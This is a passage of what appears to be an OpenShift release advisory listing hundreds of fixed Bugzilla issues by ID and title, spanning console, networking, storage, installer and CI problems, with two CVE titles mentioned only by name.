Home -\u003e Search page\n1990255 - Partial or all of the Nodes/StorageClasses don\u0027t appear back on UI after text is removed from search bar\n1990489 - etcdHighNumberOfFailedGRPCRequests fires only on metal env in CI\n1990506 - Missing udev rules in initramfs for /dev/disk/by-id/scsi-* symlinks\n1990556 - get-resources.sh doesn\u0027t honor the no_proxy settings even with no_proxy var\n1990625 - Ironic agent registers with SLAAC address with privacy-stable\n1990635 - CVO does not recognize the channel change if desired version and channel changed at the same time\n1991067 - github.com can not be resolved inside pods where cluster is running on openstack. \n1991573 - Enable typescript strictNullCheck on network-policies files\n1991641 - Baremetal Cluster Operator still Available After Delete Provisioning\n1991770 - The logLevel and operatorLogLevel values do not work with Cloud Credential Operator\n1991819 - Misspelled word \"ocurred\" in oc inspect cmd\n1991942 - Alignment and spacing fixes\n1992414 - Two rootdisks show on storage step if \u0027This is a CD-ROM boot source\u0027 is checked\n1992453 - The configMap failed to save on VM environment tab\n1992466 - The button \u0027Save\u0027 and \u0027Reload\u0027 are not translated on vm environment tab\n1992475 - The button \u0027Open console in New Window\u0027 and \u0027Disconnect\u0027 are not translated on vm console tab\n1992509 - Could not customize boot source due to source PVC not found\n1992541 - all the alert rules\u0027 annotations \"summary\" and \"description\" should comply with the OpenShift alerting guidelines\n1992580 - storageProfile should stay with the same value by check/uncheck the apply button\n1992592 - list-type missing in oauth.config.openshift.io for identityProviders breaking Server Side Apply\n1992777 - [IBMCLOUD] Default \"ibm_iam_authorization_policy\" is not working as expected in all scenarios\n1993364 - cluster destruction fails to remove router in BYON with Kuryr as primary network (even after BZ 1940159 got fixed)\n1993376 - periodic-ci-openshift-release-master-ci-4.6-upgrade-from-stable-4.5-e2e-azure-upgrade is permfailing\n1994094 - Some hardcodes are detected at the code level in OpenShift console components\n1994142 - Missing required cloud config fields for IBM Cloud\n1994733 - MetalLB: IP address is not assigned to service if there is duplicate IP address in two address pools\n1995021 - resolv.conf and corefile sync slows down/stops after keepalived container restart\n1995335 - [SCALE] ovnkube CNI: remove ovs flows check\n1995493 - Add Secret to workload button and Actions button are not aligned on secret details page\n1995531 - Create RDO-based Ironic image to be promoted to OKD\n1995545 - Project drop-down amalgamates inside main screen while creating storage system for odf-operator\n1995887 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs\n1995924 - CMO should report `Upgradeable: false` when HA workload is incorrectly spread\n1996023 - kubernetes.io/hostname values are larger than filter when create localvolumeset from webconsole\n1996108 - Allow backwards compatibility of shared gateway mode to inject host-based routes into OVN\n1996624 - 100% of the cco-metrics/cco-metrics targets in openshift-cloud-credential-operator namespace are down\n1996630 - Fail to delete the first Authorized SSH Key input box on Advanced page\n1996647 - Provide more useful degraded message in auth operator on DNS errors\n1996736 - Large number of 501 lr-policies in INCI2 env\n1996886 - timedout waiting for flows during pod creation and ovn-controller pegged on worker nodes\n1996916 - Special Resource Operator(SRO) - Fail to deploy simple-kmod on GCP\n1996928 - Enable default operator indexes on ARM\n1997028 - prometheus-operator update removes env var support for thanos-sidecar\n1997059 - Failed to create cluster in AWS us-east-1 region due to a local zone is used\n1997226 - Ingresscontroller reconcilations failing but not shown in operator logs or status of ingresscontroller. \n1997245 - \"Subscription already exists in openshift-storage namespace\" error message is seen while installing odf-operator via UI\n1997269 - Have to refresh console to install kube-descheduler\n1997478 - Storage operator is not available after reboot cluster instances\n1997509 - flake: [sig-cli] oc builds new-build [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n1997967 - storageClass is not reserved from default wizard to customize wizard\n1998035 - openstack IPI CI: custom var-lib-etcd.mount (ramdisk) unit is racing due to incomplete After/Before order\n1998038 - [e2e][automation] add tests for UI for VM disk hot-plug\n1998087 - Fix CephHealthCheck wrapping contents and add data-tests for HealthItem and SecondaryStatus\n1998174 - Create storageclass gp3-csi after install ocp cluster on aws\n1998183 - \"r: Bad Gateway\" info is improper\n1998235 - Firefox warning: Cookie \u201ccsrf-token\u201d will be soon rejected\n1998377 - Filesystem table head is not full displayed in disk tab\n1998378 - Virtual Machine is \u0027Not available\u0027 in Home -\u003e Overview -\u003e Cluster inventory\n1998519 - Add fstype when create localvolumeset instance on web console\n1998951 - Keepalived conf ingress peer on in Dual stack cluster contains both IPv6 and IPv4 addresses\n1999076 - [UI] Page Not Found error when clicking on Storage link provided in Overview page\n1999079 - creating pods before sriovnetworknodepolicy sync up succeed will cause node unschedulable\n1999091 - Console update toast notification can appear multiple times\n1999133 - removing and recreating static pod manifest leaves pod in error state\n1999246 - .indexignore is not ingore when oc command load dc configuration\n1999250 - ArgoCD in GitOps operator can\u0027t manage namespaces\n1999255 - ovnkube-node always crashes out the first time it starts\n1999261 - ovnkube-node log spam (and security token leak?)\n1999309 - While installing odf-operator via UI, web console update pop-up navigates to OperatorHub -\u003e Operator Installation page\n1999314 - console-operator is slow to mark Degraded as False once console starts working\n1999425 - kube-apiserver with \"[SHOULD NOT HAPPEN] failed to update managedFields\" err=\"failed to convert new object (machine.openshift.io/v1beta1, Kind=MachineHealthCheck)\n1999556 - \"master\" pool should be updated before the CVO reports available at the new version occurred\n1999578 - AWS EFS CSI tests are constantly failing\n1999603 - Memory Manager allows Guaranteed QoS Pod with hugepages requested is exactly equal to the left over Hugepages\n1999619 - cloudinit is malformatted if a user sets a password during VM creation flow\n1999621 - Empty ssh_authorized_keys entry is added to VM\u0027s cloudinit if created from a customize flow\n1999649 - MetalLB: Only one type of IP address can be assigned to service on dual stack cluster from a address pool that have both IPv4 and IPv6 addresses defined\n1999668 - openshift-install destroy cluster panic\u0027s when given invalid credentials to cloud provider (Azure Stack Hub)\n1999734 - IBM Cloud CIS Instance CRN missing in infrastructure manifest/resource\n1999771 - revert \"force cert rotation every couple days for development\" in 4.10\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n1999796 - Openshift Console `Helm` tab is not showing helm releases in a namespace when there is high number of deployments in the same namespace. \n1999836 - Admin web-console inconsistent status summary of sparse ClusterOperator conditions\n1999903 - Click \"This is a CD-ROM boot source\" ticking \"Use template size PVC\" on pvc upload form\n1999983 - No way to clear upload error from template boot source\n2000081 - [IPI baremetal] The metal3 pod failed to restart when switching from Disabled to Managed provisioning without specifying provisioningInterface parameter\n2000096 - Git URL is not re-validated on edit build-config form reload\n2000216 - Successfully imported ImageStreams are not resolved in DeploymentConfig\n2000236 - Confusing usage message from dynkeepalived CLI\n2000268 - Mark cluster unupgradable if vcenter, esxi versions or HW versions are unsupported\n2000430 - bump cluster-api-provider-ovirt version in installer\n2000450 - 4.10: Enable static PV multi-az test\n2000490 - All critical alerts shipped by CMO should have links to a runbook\n2000521 - Kube-apiserver CO degraded due to failed conditional check (ConfigObservationDegraded)\n2000573 - Incorrect StorageCluster CR created and ODF cluster getting installed with 2 Zone OCP cluster\n2000628 - ibm-flashsystem-storage-storagesystem got created without any warning even when the attempt was cancelled\n2000651 - ImageStreamTag alias results in wrong tag and invalid link in Web Console\n2000754 - IPerf2 tests should be lower\n2000846 - Structure logs in the entire codebase of Local Storage Operator\n2000872 - [tracker] container is not able to list on some directories within the nfs after upgrade to 4.7.24\n2000877 - OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM\n2000938 - CVO does not respect changes to a Deployment strategy\n2000963 - \u0027Inline-volume (default fs)] volumes should store data\u0027 tests are failing on OKD with updated selinux-policy\n2001008 - [MachineSets] CloneMode defaults to linkedClone, but I don\u0027t have snapshot and should be fullClone\n2001240 - Remove response headers for downloads of binaries from OpenShift WebConsole\n2001295 - Remove openshift:kubevirt-machine-controllers decleration from machine-api\n2001317 - OCP Platform Quota Check - Inaccurate MissingQuota error\n2001337 - Details Card in ODF Dashboard mentions OCS\n2001339 - fix text content hotplug\n2001413 - [e2e][automation] add/delete nic and disk to template\n2001441 - Test: oc adm must-gather runs successfully for audit logs - fail due to startup log\n2001442 - Empty termination.log file for the kube-apiserver has too permissive mode\n2001479 - IBM Cloud DNS unable to create/update records\n2001566 - Enable alerts for prometheus operator in UWM\n2001575 - Clicking on the perspective switcher shows a white page with loader\n2001577 - Quick search placeholder is not displayed properly when the search string is removed\n2001578 - [e2e][automation] add tests for vm dashboard tab\n2001605 - PVs remain in Released state for a long time after the claim is deleted\n2001617 - BucketClass Creation is restricted on 1st page but enabled using side navigation options\n2001620 - Cluster becomes degraded if it can\u0027t talk to Manila\n2001760 - While creating \u0027Backing Store\u0027, \u0027Bucket Class\u0027, \u0027Namespace Store\u0027 user is navigated to \u0027Installed Operators\u0027 page after clicking on ODF\n2001761 - Unable to apply cluster operator storage for SNO on GCP platform. \n2001765 - Some error message in the log of diskmaker-manager caused confusion\n2001784 - show loading page before final results instead of showing a transient message No log files exist\n2001804 - Reload feature on Environment section in Build Config form does not work properly\n2001810 - cluster admin unable to view BuildConfigs in all namespaces\n2001817 - Failed to load RoleBindings list that will lead to \u2018Role name\u2019 is not able to be selected on Create RoleBinding page as well\n2001823 - OCM controller must update operator status\n2001825 - [SNO]ingress/authentication clusteroperator degraded when enable ccm from start\n2001835 - Could not select image tag version when create app from dev console\n2001855 - Add capacity is disabled for ocs-storagecluster\n2001856 - Repeating event: MissingVersion no image found for operand pod\n2001959 - Side nav list borders don\u0027t extend to edges of container\n2002007 - Layout issue on \"Something went wrong\" page\n2002010 - ovn-kube may never attempt to retry a pod creation\n2002012 - Cannot change volume mode when cloning a VM from a template\n2002027 - Two instances of Dotnet helm chart show as one in topology\n2002075 - opm render does not automatically pulling in the image(s) used in the deployments\n2002121 - [OVN] upgrades failed for IPI OSP16 OVN IPSec cluster\n2002125 - Network policy details page heading should be updated to Network Policy details\n2002133 - [e2e][automation] add support/virtualization and improve deleteResource\n2002134 - [e2e][automation] add test to verify vm details tab\n2002215 - Multipath day1 not working on s390x\n2002238 - Image stream tag is not persisted when switching from yaml to form editor\n2002262 - [vSphere] Incorrect user agent in vCenter sessions list\n2002266 - SinkBinding create form doesn\u0027t allow to use subject name, instead of label selector\n2002276 - OLM fails to upgrade operators immediately\n2002300 - Altering the Schedule Profile configurations doesn\u0027t affect the placement of the pods\n2002354 - Missing DU configuration \"Done\" status reporting during ZTP flow\n2002362 - Dynamic Plugin - ConsoleRemotePlugin for webpack doesn\u0027t use commonjs\n2002368 - samples should not go degraded when image allowedRegistries blocks imagestream creation\n2002372 - Pod creation failed due to mismatched pod IP address in CNI and OVN\n2002397 - Resources search is inconsistent\n2002434 - CRI-O leaks some children PIDs\n2002443 - Getting undefined error on create local volume set page\n2002461 - DNS operator performs spurious updates in response to API\u0027s defaulting of service\u0027s internalTrafficPolicy\n2002504 - When the openshift-cluster-storage-operator is degraded because of \"VSphereProblemDetectorController_SyncError\", the insights operator is not sending the logs from all pods. \n2002559 - User preference for topology list view does not follow when a new namespace is created\n2002567 - Upstream SR-IOV worker doc has broken links\n2002588 - Change text to be sentence case to align with PF\n2002657 - ovn-kube egress IP monitoring is using a random port over the node network\n2002713 - CNO: OVN logs should have millisecond resolution\n2002748 - [ICNI2] \u0027ErrorAddingLogicalPort\u0027 failed to handle external GW check: timeout waiting for namespace event\n2002759 - Custom profile should not allow not including at least one required HTTP2 ciphersuite\n2002763 - Two storage systems getting created with external mode RHCS\n2002808 - KCM does not use web identity credentials\n2002834 - Cluster-version operator does not remove unrecognized volume mounts\n2002896 - Incorrect result return when user filter data by name on search page\n2002950 - Why spec.containers.command is not created with \"oc create deploymentconfig \u003cdc-name\u003e --image=\u003cimage\u003e -- \u003ccommand\u003e\"\n2003096 - [e2e][automation] check bootsource URL is displaying on review step\n2003113 - OpenShift Baremetal IPI installer uses first three defined nodes under hosts in install-config for master nodes instead of filtering the hosts with the master role\n2003120 - CI: Uncaught error with ResizeObserver on operand details page\n2003145 - Duplicate operand tab titles causes \"two children with the same key\" warning\n2003164 - OLM, fatal error: concurrent map writes\n2003178 - [FLAKE][knative] The UI doesn\u0027t show updated traffic distribution after accepting the form\n2003193 - Kubelet/crio leaks netns and veth ports in the host\n2003195 - OVN CNI should ensure host veths are removed\n2003204 - Jenkins all new container images (openshift4/ose-jenkins) not supporting \u0027-e JENKINS_PASSWORD=password\u0027 ENV which was working for old container images\n2003206 - Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace\n2003239 - \"[sig-builds][Feature:Builds][Slow] can use private repositories as build input\" tests fail outside of CI\n2003244 - Revert libovsdb client code\n2003251 - Patternfly components with list element has list item bullet when they should not. \n2003252 - \"[sig-builds][Feature:Builds][Slow] starting a build using CLI start-build test context override environment BUILD_LOGLEVEL in buildconfig\" tests do not work as expected outside of CI\n2003269 - Rejected pods should be filtered from admission regression\n2003357 - QE- Removing the epic tags for gherkin tags related to 4.9 Release\n2003426 - [e2e][automation] add test for vm details bootorder\n2003496 - [e2e][automation] add test for vm resources requirment settings\n2003641 - All metal ipi jobs are failing in 4.10\n2003651 - ODF4.9+LSO4.8 installation via UI, StorageCluster move to error state\n2003655 - [IPI ON-PREM] Keepalived chk_default_ingress track script failed even though default router pod runs on node\n2003683 - Samples operator is panicking in CI\n2003711 - [UI] Empty file ceph-external-cluster-details-exporter.py downloaded from external cluster \"Connection Details\" page\n2003715 - Error on creating local volume set after selection of the volume mode\n2003743 - Remove workaround keeping /boot RW for kdump support\n2003775 - etcd pod on CrashLoopBackOff after master replacement procedure\n2003788 - CSR reconciler report error constantly when BYOH CSR approved by other Approver\n2003792 - Monitoring metrics query graph flyover panel is useless\n2003808 - Add Sprint 207 translations\n2003845 - Project admin cannot access image vulnerabilities view\n2003859 - sdn emits events with garbage messages\n2003896 - (release-4.10) ApiRequestCounts conditional gatherer\n2004009 - 4.10: Fix multi-az zone scheduling e2e for 5 control plane replicas\n2004051 - CMO can report as being Degraded while node-exporter is deployed on all nodes\n2004059 - [e2e][automation] fix current tests for downstream\n2004060 - Trying to use basic spring boot sample causes crash on Firefox\n2004101 - [UI] When creating storageSystem deployment type dropdown under advanced setting doesn\u0027t close after selection\n2004127 - [flake] openshift-controller-manager event reason/SuccessfulDelete occurs too frequently\n2004203 - build config\u0027s created prior to 4.8 with image change triggers can result in trigger storm in OCM/openshift-apiserver\n2004313 - [RHOCP 4.9.0-rc.0] Failing to deploy Azure cluster from the macOS installer - ignition_bootstrap.ign: no such file or directory\n2004449 - Boot option recovery menu prevents image boot\n2004451 - The backup filename displayed in the RecentBackup message is incorrect\n2004459 - QE - Modified the AddFlow gherkin scripts and automation scripts\n2004508 - TuneD issues with the recent ConfigParser changes. \n2004510 - openshift-gitops operator hooks gets unauthorized (401) errors during jobs executions\n2004542 - [osp][octavia lb] cannot create LoadBalancer type svcs\n2004578 - Monitoring and node labels missing for an external storage platform\n2004585 - prometheus-k8s-0 cpu usage keeps increasing for the first 3 days\n2004596 - [4.10] Bootimage bump tracker\n2004597 - Duplicate ramdisk log containers running\n2004600 - Duplicate ramdisk log containers running\n2004609 - output of \"crictl inspectp\" is not complete\n2004625 - BMC credentials could be logged if they change\n2004632 - When LE takes a large amount of time, multiple whereabouts are seen\n2004721 - ptp/worker custom threshold doesn\u0027t change ptp events threshold\n2004736 - [knative] Create button on new Broker form is inactive despite form being filled\n2004796 - [e2e][automation] add test for vm scheduling policy\n2004814 - (release-4.10) OCM controller - change type of the etc-pki-entitlement secret to opaque\n2004870 - [External Mode] Insufficient spacing along y-axis in RGW Latency Performance Card\n2004901 - [e2e][automation] improve kubevirt devconsole tests\n2004962 - Console frontend job consuming too much CPU in CI\n2005014 - state of ODF StorageSystem is misreported during installation or uninstallation\n2005052 - Adding a MachineSet selector matchLabel causes orphaned Machines\n2005179 - pods status filter is not taking effect\n2005182 - sync list of deprecated apis about to be removed\n2005282 - Storage cluster name is given as title in StorageSystem details page\n2005355 - setuptools 58 makes Kuryr CI fail\n2005407 - ClusterNotUpgradeable Alert should be set to Severity Info\n2005415 - PTP operator with sidecar api configured throws bind: address already in use\n2005507 - SNO spoke cluster failing to reach coreos.live.rootfs_url is missing url in console\n2005554 - The switch status of the button \"Show default project\" is not revealed correctly in code\n2005581 - 4.8.12 to 4.9 upgrade hung due to cluster-version-operator pod CrashLoopBackOff: error creating clients: invalid configuration: no configuration has been provided, try setting KUBERNETES_MASTER environment variable\n2005761 - QE - Implementing crw-basic feature file\n2005783 - Fix accessibility issues in the \"Internal\" and \"Internal - Attached Mode\" Installation Flow\n2005811 - vSphere Problem Detector operator - ServerFaultCode: InvalidProperty\n2005854 - SSH NodePort service is created for each VM\n2005901 - KS, KCM and KA going Degraded during master nodes upgrade\n2005902 - Current UI flow for MCG only deployment is confusing and doesn\u0027t reciprocate any message to the end-user\n2005926 - PTP operator NodeOutOfPTPSync rule is using max offset from the master instead of openshift_ptp_clock_state metrics\n2005971 - Change telemeter to report the Application Services product usage metrics\n2005997 - SELinux domain container_logreader_t does not have a policy to follow sym links for log files\n2006025 - Description to use an existing StorageClass while creating StorageSystem needs to be re-phrased\n2006060 - ocs-storagecluster-storagesystem details are missing on UI for MCG Only and MCG only in LSO mode deployment types\n2006101 - Power off fails for drivers that don\u0027t support Soft power off\n2006243 - Metal IPI upgrade jobs are running out of disk space\n2006291 - bootstrapProvisioningIP set incorrectly when provisioningNetworkCIDR doesn\u0027t use the 0th address\n2006308 - Backing Store YAML tab on click displays a blank screen on UI\n2006325 - Multicast is broken across nodes\n2006329 - Console only allows Web Terminal Operator to be installed in OpenShift Operators\n2006364 - IBM Cloud: Set resourceGroupId for resourceGroups, not simply resource\n2006561 - [sig-instrumentation] Prometheus when installed on the cluster shouldn\u0027t have failing rules evaluation [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2006690 - OS boot failure \"x64 Exception Type 06 - Invalid Opcode Exception\"\n2006714 - add retry for etcd errors in kube-apiserver\n2006767 - KubePodCrashLooping may not fire\n2006803 - Set CoreDNS cache entries for forwarded zones\n2006861 - Add Sprint 207 part 2 translations\n2006945 - race condition can cause crashlooping bootstrap kube-apiserver in cluster-bootstrap\n2006947 - e2e-aws-proxy for 4.10 is permafailing with samples operator errors\n2006975 - clusteroperator/etcd status condition should not change reasons frequently due to EtcdEndpointsDegraded\n2007085 - Intermittent failure mounting /run/media/iso when booting live ISO from USB stick\n2007136 - Creation of BackingStore, BucketClass, NamespaceStore fails\n2007271 - CI Integration for Knative test cases\n2007289 - kubevirt tests are failing in CI\n2007322 - Devfile/Dockerfile import does not work for unsupported git host\n2007328 - Updated patternfly to v4.125.3 and pf.quickstarts to v1.2.3. \n2007379 - Events are not generated for master offset for ordinary clock\n2007443 - [ICNI 2.0] Loadbalancer pods do not establish BFD sessions with all workers that host pods for the routed namespace\n2007455 - cluster-etcd-operator: render command should fail if machineCidr contains reserved address\n2007495 - Large label value for the metric kubelet_started_pods_errors_total with label message when there is a error\n2007522 - No new local-storage-operator-metadata-container is build for 4.10\n2007551 - No new ose-aws-efs-csi-driver-operator-bundle-container is build for 4.10\n2007580 - Azure cilium installs are failing e2e tests\n2007581 - Too many haproxy processes in default-router pod causing high load average after upgrade from v4.8.3 to v4.8.10\n2007677 - Regression: core container io performance metrics are missing for pod, qos, and system slices on nodes\n2007692 - 4.9 \"old-rhcos\" jobs are permafailing with storage test failures\n2007710 - ci/prow/e2e-agnostic-cmd job is failing on prow\n2007757 - must-gather extracts imagestreams in the \"openshift\" namespace, but not Templates\n2007802 - AWS machine actuator get stuck if machine is completely missing\n2008096 - TestAWSFinalizerDeleteS3Bucket sometimes fails to teardown operator\n2008119 - The serviceAccountIssuer field on Authentication CR is reseted to \u201c\u201d when installation process\n2008151 - Topology breaks on clicking in empty state\n2008185 - Console operator go.mod should use go 1.16.version\n2008201 - openstack-az job is failing on haproxy idle test\n2008207 - vsphere CSI driver doesn\u0027t set resource limits\n2008223 - gather_audit_logs: fix oc command line to get the current audit profile\n2008235 - The Save button in the Edit DC form remains disabled\n2008256 - Update Internationalization README with scope info\n2008321 - Add correct documentation link for MON_DISK_LOW\n2008462 - Disable PodSecurity feature gate for 4.10\n2008490 - Backing store details page does not contain all the kebab actions. \n2008521 - gcp-hostname service should correct invalid search entries in resolv.conf\n2008532 - CreateContainerConfigError:: failed to prepare subPath for volumeMount\n2008539 - Registry doesn\u0027t fall back to secondary ImageContentSourcePolicy Mirror\n2008540 - HighlyAvailableWorkloadIncorrectlySpread always fires on upgrade on cluster with two workers\n2008599 - Azure Stack UPI does not have Internal Load Balancer\n2008612 - Plugin asset proxy does not pass through browser cache headers\n2008712 - VPA webhook timeout prevents all pods from starting\n2008733 - kube-scheduler: exposed /debug/pprof port\n2008911 - Prometheus repeatedly scaling prometheus-operator replica set\n2008926 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]\n2008987 - OpenShift SDN Hosted Egress IP\u0027s are not being scheduled to nodes after upgrade to 4.8.12\n2009055 - Instances of OCS to be replaced with ODF on UI\n2009078 - NetworkPodsCrashLooping alerts in upgrade CI jobs\n2009083 - opm blocks pruning of existing bundles during add\n2009111 - [IPI-on-GCP] \u0027Install a cluster with nested virtualization enabled\u0027 failed due to unable to launch compute instances\n2009131 - [e2e][automation] add more test about vmi\n2009148 - [e2e][automation] test vm nic presets and options\n2009233 - ACM policy object generated by PolicyGen conflicting with OLM Operator\n2009253 - [BM] [IPI] [DualStack] apiVIP and ingressVIP should be of the same primary IP family\n2009298 - Service created for VM SSH access is not owned by the VM and thus is not deleted if the VM is deleted\n2009384 - UI changes to support BindableKinds CRD changes\n2009404 - ovnkube-node pod enters CrashLoopBackOff after OVN_IMAGE is swapped\n2009424 - Deployment upgrade is failing availability check\n2009454 - Change web terminal subscription permissions from get to list\n2009465 - container-selinux should come from rhel8-appstream\n2009514 - Bump OVS to 2.16-15\n2009555 - Supermicro X11 system not booting from vMedia with AI\n2009623 - Console: Observe \u003e Metrics page: Table pagination menu shows bullet points\n2009664 - Git Import: Edit of knative service doesn\u0027t work as expected for git import flow\n2009699 - Failure to validate flavor RAM\n2009754 - Footer is not sticky anymore in import forms\n2009785 - CRI-O\u0027s version file should be pinned by MCO\n2009791 - Installer: ibmcloud ignores install-config values\n2009823 - [sig-arch] events should not repeat pathologically - reason/VSphereOlderVersionDetected Marking cluster un-upgradeable because one or more VMs are on hardware version vmx-13\n2009840 - cannot build extensions on aarch64 because of unavailability of rhel-8-advanced-virt repo\n2009859 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests\n2009873 - Stale Logical Router Policies and Annotations for a given node\n2009879 - There should be test-suite coverage to ensure admin-acks work as expected\n2009888 - SRO package name collision between official and community version\n2010073 - uninstalling and then reinstalling sriov-network-operator is not working\n2010174 - 2 PVs get created unexpectedly with different paths that actually refer to the same device on the node. \n2010181 - Environment variables not getting reset on reload on deployment edit form\n2010310 - [sig-instrumentation][Late] OpenShift alerting rules should have description and summary annotations [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2010341 - OpenShift Alerting Rules Style-Guide Compliance\n2010342 - Local console builds can have out of memory errors\n2010345 - OpenShift Alerting Rules Style-Guide Compliance\n2010348 - Reverts PIE build mode for K8S components\n2010352 - OpenShift Alerting Rules Style-Guide Compliance\n2010354 - OpenShift Alerting Rules Style-Guide Compliance\n2010359 - OpenShift Alerting Rules Style-Guide Compliance\n2010368 - OpenShift Alerting Rules Style-Guide Compliance\n2010376 - OpenShift Alerting Rules Style-Guide Compliance\n2010662 - Cluster is unhealthy after image-registry-operator tests\n2010663 - OpenShift Alerting Rules Style-Guide Compliance (ovn-kubernetes subcomponent)\n2010665 - Bootkube tries to use oc after cluster bootstrap is done and there is no API\n2010698 - [BM] [IPI] [Dual Stack] Installer must ensure ipv6 short forms too if clusterprovisioning IP is specified as ipv6 address\n2010719 - etcdHighNumberOfFailedGRPCRequests runbook is missing\n2010864 - Failure building EFS operator\n2010910 - ptp worker events unable to identify interface for multiple interfaces\n2010911 - RenderOperatingSystem() returns wrong OS version on OCP 4.7.24\n2010921 - Azure Stack Hub does not handle additionalTrustBundle\n2010931 - SRO CSV uses non default category \"Drivers and plugins\"\n2010946 - concurrent CRD from ovirt-csi-driver-operator gets reconciled by CVO after deployment, changing CR as well. \n2011038 - optional operator conditions are confusing\n2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass\n2011171 - diskmaker-manager constantly redeployed by LSO when creating LV\u0027s\n2011293 - Build pod are not pulling images if we are not explicitly giving the registry name with the image\n2011368 - Tooltip in pipeline visualization shows misleading data\n2011386 - [sig-arch] Check if alerts are firing during or after upgrade success --- alert KubePodNotReady fired for 60 seconds with labels\n2011411 - Managed Service\u0027s Cluster overview page contains link to missing Storage dashboards\n2011443 - Cypress tests assuming Admin Perspective could fail on shared/reference cluster\n2011513 - Kubelet rejects pods that use resources that should be freed by completed pods\n2011668 - Machine stuck in deleting phase in VMware \"reconciler failed to Delete machine\"\n2011693 - (release-4.10) \"insightsclient_request_recvreport_total\" metric is always incremented\n2011698 - After upgrading cluster to 4.8 the kube-state-metrics service doesn\u0027t export namespace labels anymore\n2011733 - Repository README points to broken documentarion link\n2011753 - Ironic resumes clean before raid configuration job is actually completed\n2011809 - The nodes page in the openshift console doesn\u0027t work. You just get a blank page\n2011822 - Obfuscation doesn\u0027t work at clusters with OVN\n2011882 - SRO helm charts not synced with templates\n2011893 - Validation: BMC driver ipmi is not supported for secure UEFI boot\n2011896 - [4.10] ClusterVersion Upgradeable=False MultipleReasons should include all messages\n2011903 - vsphere-problem-detector: session leak\n2011927 - OLM should allow users to specify a proxy for GRPC connections\n2011956 - [tracker] Kubelet rejects pods that use resources that should be freed by completed pods\n2011960 - [tracker] Storage operator is not available after reboot cluster instances\n2011971 - ICNI2 pods are stuck in ContainerCreating state\n2011972 - Ingress operator not creating wildcard route for hypershift clusters\n2011977 - SRO bundle references non-existent image\n2012069 - Refactoring Status controller\n2012177 - [OCP 4.9 + OCS 4.8.3] Overview tab is missing under Storage after successful deployment on UI\n2012228 - ibmcloud: credentialsrequests invalid for machine-api-operator: resource-group\n2012233 - [IBMCLOUD] IPI: \"Exceeded limit of remote rules per security group (the limit is 5 remote rules per security group)\"\n2012235 - [IBMCLOUD] IPI: IBM cloud provider requires ResourceGroupName in cloudproviderconfig\n2012317 - Dynamic Plugins: ListPageCreateDropdown items cut off\n2012407 - [e2e][automation] improve vm tab console tests\n2012426 - ThanosSidecarBucketOperationsFailed/ThanosSidecarUnhealthy alerts don\u0027t have namespace label\n2012562 - migration condition is not detected in list view\n2012770 - when using expression metric openshift_apps_deploymentconfigs_last_failed_rollout_time namespace label is re-written\n2012780 - The port 50936 used by haproxy is occupied by kube-apiserver\n2012838 - Setting the default maximum container root partition size for Overlay with CRI-O stop working\n2012902 - Neutron Ports assigned to Completed Pods are not reused Edit\n2012915 - kube_persistentvolumeclaim_labels and kube_persistentvolume_labels are missing in OCP 4.8 monitoring stack\n2012971 - Disable operands deletes\n2013034 - Cannot install to openshift-nmstate namespace\n2013127 - OperatorHub links could not be opened in a new tabs (sharing and open a deep link works fine)\n2013199 - post reboot of node SRIOV policy taking huge time\n2013203 - UI breaks when trying to create block pool before storage cluster/system creation\n2013222 - Full breakage for nightly payload promotion\n2013273 - Nil pointer exception when phc2sys options are missing\n2013321 - TuneD: high CPU utilization of the TuneD daemon. \n2013416 - Multiple assets emit different content to the same filename\n2013431 - Application selector dropdown has incorrect font-size and positioning\n2013528 - mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8\n2013545 - Service binding created outside topology is not visible\n2013599 - Scorecard support storage is not included in ocp4.9\n2013632 - Correction/Changes in Quick Start Guides for ODF 4.9 (Install ODF guide)\n2013646 - fsync controller will show false positive if gaps in metrics are observed. \n2013710 - ZTP Operator subscriptions for 4.9 release branch should point to 4.9 by default\n2013751 - Service details page is showing wrong in-cluster hostname\n2013787 - There are two tittle \u0027Network Attachment Definition Details\u0027 on NAD details page\n2013871 - Resource table headings are not aligned with their column data\n2013895 - Cannot enable accelerated network via MachineSets on Azure\n2013920 - \"--collector.filesystem.ignored-mount-points is DEPRECATED and will be removed in 2.0.0, use --collector.filesystem.mount-points-exclude\"\n2013930 - Create Buttons enabled for Bucket Class, Backingstore and Namespace Store in the absence of Storagesystem(or MCG)\n2013969 - oVIrt CSI driver fails on creating PVCs on hosted engine storage domain\n2013990 - Observe dashboard crashs on reload when perspective has changed (in another tab)\n2013996 - Project detail page: Action \"Delete Project\" does nothing for the default project\n2014071 - Payload imagestream new tags not properly updated during cluster upgrade\n2014153 - SRIOV exclusive pooling\n2014202 - [OCP-4.8.10] OVN-Kubernetes: service IP is not responding when egressIP set to the namespace\n2014238 - AWS console test is failing on importing duplicate YAML definitions\n2014245 - Several aria-labels, external links, and labels aren\u0027t internationalized\n2014248 - Several files aren\u0027t internationalized\n2014352 - Could not filter out machine by using node name on machines page\n2014464 - Unexpected spacing/padding below navigation groups in developer perspective\n2014471 - Helm Release notes tab is not automatically open after installing a chart for other languages\n2014486 - Integration Tests: OLM single namespace operator tests failing\n2014488 - Custom operator cannot change orders of condition tables\n2014497 - Regex slows down different forms and creates too much recursion errors in the log\n2014538 - Kuryr controller crash looping on self._get_vip_port(loadbalancer).id \u0027NoneType\u0027 object has no attribute \u0027id\u0027\n2014614 - Metrics scraping requests should be assigned to exempt priority level\n2014710 - TestIngressStatus test is broken on Azure\n2014954 - The prometheus-k8s-{0,1} pods are CrashLoopBackoff repeatedly\n2014995 - oc adm must-gather cannot gather audit logs with \u0027None\u0027 audit profile\n2015115 - [RFE] PCI passthrough\n2015133 - [IBMCLOUD] ServiceID API key credentials seems to be insufficient for ccoctl \u0027--resource-group-name\u0027 parameter\n2015154 - Support ports defined networks and primarySubnet\n2015274 - Yarn dev fails after updates to dynamic plugin JSON schema logic\n2015337 - 4.9.0 GA MetalLB operator image references need to be adjusted to match production\n2015386 - Possibility to add labels to the built-in OCP 